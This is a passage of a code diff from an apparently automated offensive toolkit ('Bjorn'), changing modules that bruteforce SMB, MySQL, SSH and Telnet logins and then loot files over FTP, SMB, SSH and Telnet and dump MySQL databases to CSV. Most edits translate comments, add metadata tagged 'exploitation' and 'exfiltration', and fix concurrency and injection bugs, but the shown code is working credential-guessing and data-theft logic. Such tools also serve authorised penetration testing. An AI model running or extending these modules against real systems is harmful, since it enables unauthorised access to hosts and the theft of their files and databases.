stdout, stderr = process.communicate(timeout=timeout)
|
||||
except TimeoutExpired:
|
||||
@@ -164,7 +172,7 @@ class SMBConnector:
|
||||
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error executing '{cmd}': {e}")
|
||||
logger.error(f"Error executing smbclient -L for {adresse_ip}: {e}")
|
||||
return []
|
||||
finally:
|
||||
if process:
|
||||
@@ -269,7 +277,7 @@ class SMBConnector:
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
@@ -339,7 +347,7 @@ class SMBConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# insère self.results dans creds (service='smb'), database = <share>
|
||||
# Insert results into creds (service='smb'), database = <share>
|
||||
for mac, ip, hostname, share, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
@@ -350,7 +358,7 @@ class SMBConnector:
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=share, # utilise la colonne 'database' pour distinguer les shares
|
||||
database=share, # uses the 'database' column to distinguish shares
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
@@ -364,12 +372,12 @@ class SMBConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
# plus nécessaire avec l'index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Mode autonome non utilisé en prod; on laisse simple
|
||||
# Standalone mode, not used in prod
|
||||
try:
|
||||
sd = SharedData()
|
||||
smb_bruteforce = SMBBruteforce(sd)
|
||||
|
||||
@@ -1,11 +1,4 @@
|
||||
"""
|
||||
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
|
||||
- Succès -> DB.creds (service='sql', database=<db>)
|
||||
- Conserve la logique (pymysql, queue/threads)
|
||||
"""
|
||||
“””sql_bruteforce.py - Threaded MySQL credential bruteforcer with database enumeration.”””
|
||||
|
||||
import os
|
||||
import pymysql
|
||||
@@ -29,11 +22,24 @@ b_parent = None
|
||||
b_service = '["sql"]'
|
||||
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "sql", "mysql", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SQL Bruteforce"
|
||||
b_description = "Threaded MySQL credential bruteforcer with database enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SQLBruteforce.png"
|
||||
|
||||
class SQLBruteforce:
|
||||
"""Wrapper orchestrateur -> SQLConnector."""
|
||||
"""Orchestrator wrapper for SQLConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -41,11 +47,11 @@ class SQLBruteforce:
|
||||
logger.info("SQLConnector initialized.")
|
||||
|
||||
def bruteforce_sql(self, ip, port):
|
||||
"""Lance le bruteforce SQL pour (ip, port)."""
|
||||
"""Run SQL bruteforce for (ip, port)."""
|
||||
return self.sql_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SQLBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_sql(ip, port)
|
||||
@@ -53,12 +59,12 @@ class SQLBruteforce:
|
||||
|
||||
|
||||
class SQLConnector:
|
||||
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SQL (MySQL) attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class SQLConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -115,7 +121,7 @@ class SQLConnector:
|
||||
# ---------- SQL ----------
|
||||
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
|
||||
"""
|
||||
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
|
||||
Connect without DB then SHOW DATABASES. Returns (True, [dbs]) or (False, []).
|
||||
"""
|
||||
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
|
||||
try:
|
||||
@@ -188,7 +194,7 @@ class SQLConnector:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, port = self.queue.get()
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
|
||||
if success:
|
||||
@@ -213,6 +219,8 @@ class SQLConnector:
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
self.results = []
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
@@ -232,7 +240,7 @@ class SQLConnector:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return
|
||||
self.queue.put((adresse_ip, user, password, port))
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
threads = []
|
||||
thread_count = min(8, max(1, phase_tasks))
|
||||
@@ -261,7 +269,7 @@ class SQLConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
|
||||
# For each DB found, create/update a row in creds (service='sql', database=<dbname>)
|
||||
for ip, user, password, port, dbname in self.results:
|
||||
mac = self.mac_for_ip(ip)
|
||||
hostname = self.hostname_for_ip(ip) or ""
|
||||
@@ -288,7 +296,7 @@ class SQLConnector:
|
||||
self.results = []
|
||||
|
||||
def remove_duplicates(self):
|
||||
# inutile avec l’index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
|
||||
@@ -1,15 +1,4 @@
|
||||
"""
|
||||
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
|
||||
to find accessible accounts using various user credentials. It logs the results of
|
||||
successful connections.
|
||||
|
||||
SQL version (minimal changes):
|
||||
- Targets still provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
|
||||
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
|
||||
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
|
||||
"""
|
||||
"""ssh_bruteforce.py - Threaded SSH credential bruteforcer via paramiko."""
|
||||
|
||||
import os
|
||||
import paramiko
|
||||
@@ -24,7 +13,6 @@ from shared import SharedData
|
||||
from actions.bruteforce_common import ProgressTracker, merged_password_plan
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko internals
|
||||
@@ -32,7 +20,6 @@ for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hos
|
||||
"paramiko.kex", "paramiko.auth_handler"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
# Define the necessary global variables
|
||||
b_class = "SSHBruteforce"
|
||||
b_module = "ssh_bruteforce"
|
||||
b_status = "brute_force_ssh"
|
||||
@@ -40,9 +27,22 @@ b_port = 22
|
||||
b_service = '["ssh"]'
|
||||
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
|
||||
b_parent = None
|
||||
b_priority = 70 # tu peux ajuster la priorité si besoin
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ssh", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SSH Bruteforce"
|
||||
b_description = "Threaded SSH credential bruteforcer via paramiko with dictionary and exhaustive modes."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SSHBruteforce.png"
|
||||
|
||||
|
||||
class SSHBruteforce:
|
||||
@@ -298,6 +298,19 @@ class SSHConnector:
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
# Drain queue if orchestrator exit is requested, to unblock join
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
# Discard remaining items so workers can finish
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
time.sleep(0.5)
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
@@ -1,13 +1,4 @@
|
||||
"""
|
||||
steal_data_sql.py — SQL data looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
|
||||
- DB.creds (service='sql') provides (user,password, database?).
|
||||
- We connect first without DB to enumerate tables (excluding system schemas),
|
||||
then connect per schema to export CSVs.
|
||||
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
|
||||
"""
|
||||
"""steal_data_sql.py - Exfiltrate MySQL databases as CSV after successful bruteforce."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -41,6 +32,12 @@ b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Data SQL"
|
||||
b_description = "Exfiltrate MySQL databases as CSV after successful credential bruteforce."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealDataSQL.png"
|
||||
|
||||
class StealDataSQL:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
@@ -169,6 +166,11 @@ class StealDataSQL:
|
||||
logger.info("Data steal interrupted.")
|
||||
return
|
||||
|
||||
# Validate identifiers to prevent SQL injection
|
||||
import re as _re
|
||||
if not _re.match(r'^[a-zA-Z0-9_]+$', schema) or not _re.match(r'^[a-zA-Z0-9_]+$', table):
|
||||
logger.warning(f"Skipping unsafe schema/table name: {schema}.{table}")
|
||||
return
|
||||
q = text(f"SELECT * FROM `{schema}`.`{table}`")
|
||||
with engine.connect() as conn:
|
||||
result = conn.execute(q)
|
||||
@@ -192,6 +194,8 @@ class StealDataSQL:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "databases": "0", "tables": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +254,6 @@ class StealDataSQL:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_ftp.py — FTP file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
|
||||
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
|
||||
- IP -> (MAC, hostname) via DB.hosts.
|
||||
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
|
||||
"""
|
||||
"""steal_files_ftp.py - Loot files from FTP servers using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -26,6 +18,24 @@ b_module = "steal_files_ftp"
|
||||
b_status = "steal_files_ftp"
|
||||
b_parent = "FTPBruteforce"
|
||||
b_port = 21
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_cred_found:ftp","on_service:ftp"]'
|
||||
b_requires = '{"all":[{"has_cred":"ftp"},{"has_port":21}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "ftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files FTP"
|
||||
b_description = "Loot files from FTP servers using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesFTP.png"
|
||||
|
||||
|
||||
class StealFilesFTP:
|
||||
@@ -108,7 +118,7 @@ class StealFilesFTP:
|
||||
return out
|
||||
|
||||
# -------- FTP helpers --------
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
# Max recursion depth for directory traversal (avoids symlink loops)
|
||||
_MAX_DEPTH = 5
|
||||
@@ -180,6 +190,8 @@ class StealFilesFTP:
|
||||
timer = None
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -268,5 +280,6 @@ class StealFilesFTP:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
if timer:
|
||||
timer.cancel()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_smb.py — SMB file looter (DB-backed).
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
|
||||
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
|
||||
- Also try anonymous (''/'').
|
||||
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
|
||||
"""
|
||||
"""steal_files_smb.py - Loot files from SMB shares using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_smb"
|
||||
b_status = "steal_files_smb"
|
||||
b_parent = "SMBBruteforce"
|
||||
b_port = 445
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_cred_found:smb","on_service:smb"]'
|
||||
b_requires = '{"all":[{"has_cred":"smb"},{"has_port":445}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "smb", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SMB"
|
||||
b_description = "Loot files from SMB shares using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSMB.png"
|
||||
|
||||
|
||||
class StealFilesSMB:
|
||||
@@ -166,6 +176,8 @@ class StealFilesSMB:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "share": "?", "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +262,6 @@ class StealFilesSMB:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,23 +1,11 @@
|
||||
"""
|
||||
steal_files_ssh.py — SSH file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
|
||||
- SSH credentials are read from the DB table `creds` (service='ssh').
|
||||
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
|
||||
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
|
||||
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
|
||||
|
||||
Parent gate:
|
||||
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
|
||||
- This action runs once per eligible target (alive, open port, parent OK).
|
||||
"""
|
||||
"""steal_files_ssh.py - Loot files over SSH/SFTP using cracked credentials."""
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import time
|
||||
import logging
|
||||
import paramiko
|
||||
from threading import Timer
|
||||
from threading import Timer, Lock
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
@@ -35,7 +23,7 @@ b_module = "steal_files_ssh" # Python module name (this file without
|
||||
b_status = "steal_files_ssh" # Human/readable status key (free form)
|
||||
|
||||
b_action = "normal" # 'normal' (per-host) or 'global'
|
||||
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
|
||||
b_service = '["ssh"]' # Services this action is about (JSON string for AST parser)
|
||||
b_port = 22 # Preferred target port (used if present on host)
|
||||
|
||||
# Trigger strategy:
|
||||
@@ -61,6 +49,13 @@ b_rate_limit = "3/86400" # at most 3 executions/day per host (ext
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
b_tags = ["exfil", "ssh", "sftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SSH"
|
||||
b_description = "Loot files over SSH/SFTP using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSSH.png"
|
||||
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "ssh", "loot"]
|
||||
@@ -71,6 +66,7 @@ class StealFilesSSH:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
|
||||
self.shared_data = shared_data
|
||||
self._state_lock = Lock() # protects sftp_connected / stop_execution
|
||||
self.sftp_connected = False # flipped to True on first SFTP open
|
||||
self.stop_execution = False # global kill switch (timer / orchestrator exit)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
@@ -194,8 +190,8 @@ class StealFilesSSH:
|
||||
- shared_data.steal_file_names (substring match)
|
||||
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
|
||||
"""
|
||||
# Quiet 'permission denied' messages via redirection
|
||||
cmd = f'find {dir_path} -type f 2>/dev/null'
|
||||
# Quiet 'permission denied' messages via redirection; escape dir_path to prevent injection
|
||||
cmd = f'find {shlex.quote(dir_path)} -type f 2>/dev/null'
|
||||
stdin, stdout, stderr = ssh.exec_command(cmd)
|
||||
files = (stdout.read().decode(errors="ignore") or "").splitlines()
|
||||
|
||||
@@ -203,7 +199,7 @@ class StealFilesSSH:
|
||||
names = set(self.shared_data.steal_file_names or [])
|
||||
if not exts and not names:
|
||||
# If no filters are defined, do nothing (too risky to pull everything).
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured - skipping.")
|
||||
return []
|
||||
|
||||
matches: List[str] = []
|
||||
@@ -218,7 +214,7 @@ class StealFilesSSH:
|
||||
logger.info(f"Found {len(matches)} matching files in {dir_path}")
|
||||
return matches
|
||||
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
|
||||
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
|
||||
@@ -227,7 +223,8 @@ class StealFilesSSH:
|
||||
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
|
||||
"""
|
||||
sftp = ssh.open_sftp()
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
with self._state_lock:
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
|
||||
try:
|
||||
# Check file size before downloading
|
||||
@@ -235,7 +232,7 @@ class StealFilesSSH:
|
||||
st = sftp.stat(remote_file)
|
||||
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
|
||||
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
|
||||
return
|
||||
return # finally block still runs and closes sftp
|
||||
except Exception:
|
||||
pass # stat failed, try download anyway
|
||||
|
||||
@@ -245,6 +242,14 @@ class StealFilesSSH:
|
||||
os.makedirs(local_file_dir, exist_ok=True)
|
||||
|
||||
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
|
||||
|
||||
# Path traversal guard: ensure we stay within local_dir
|
||||
abs_local = os.path.realpath(local_file_path)
|
||||
abs_base = os.path.realpath(local_dir)
|
||||
if not abs_local.startswith(abs_base + os.sep) and abs_local != abs_base:
|
||||
logger.warning(f"Path traversal blocked: {remote_file} -> {abs_local}")
|
||||
return
|
||||
|
||||
sftp.get(remote_file, local_file_path)
|
||||
|
||||
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
|
||||
@@ -286,9 +291,10 @@ class StealFilesSSH:
|
||||
|
||||
# Define a timer: if we never establish SFTP in 4 minutes, abort
|
||||
def _timeout():
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
with self._state_lock:
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
"""steal_files_telnet.py - Loot files over Telnet using cracked credentials."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_cred_found:telnet","on_service:telnet"]'
|
||||
b_requires = '{"all":[{"has_cred":"telnet"},{"has_port":23}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "telnet", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files Telnet"
|
||||
b_description = "Loot files over Telnet using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesTelnet.png"
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
@@ -110,7 +120,7 @@ class StealFilesTelnet:
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
# prompt detection (naïf mais identique à l'original)
|
||||
# Naive prompt detection (matches original behavior)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
@@ -159,7 +169,9 @@ class StealFilesTelnet:
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
self.shared_data.bjorn_orch_status = "StealFilesTelnet"
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -216,3 +228,6 @@ class StealFilesTelnet:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='telnet')
|
||||
- Conserve la logique d’origine (telnetlib, queue/threads)
|
||||
"""
|
||||
“””telnet_bruteforce.py - Threaded Telnet credential bruteforcer.”””
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "telnet", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "Telnet Bruteforce"
|
||||
b_description = "Threaded Telnet credential bruteforcer with prompt detection."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "TelnetBruteforce.png"
|
||||
|
||||
class TelnetBruteforce:
|
||||
"""Wrapper orchestrateur -> TelnetConnector."""
|
||||
"""Orchestrator wrapper for TelnetConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class TelnetBruteforce:
|
||||
logger.info("TelnetConnector initialized.")
|
||||
|
||||
def bruteforce_telnet(self, ip, port):
|
||||
"""Lance le bruteforce Telnet pour (ip, port)."""
|
||||
"""Run Telnet bruteforce for (ip, port)."""
|
||||
return self.telnet_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
|
||||
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
@@ -53,12 +60,12 @@ class TelnetBruteforce:
|
||||
|
||||
|
||||
class TelnetConnector:
|
||||
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
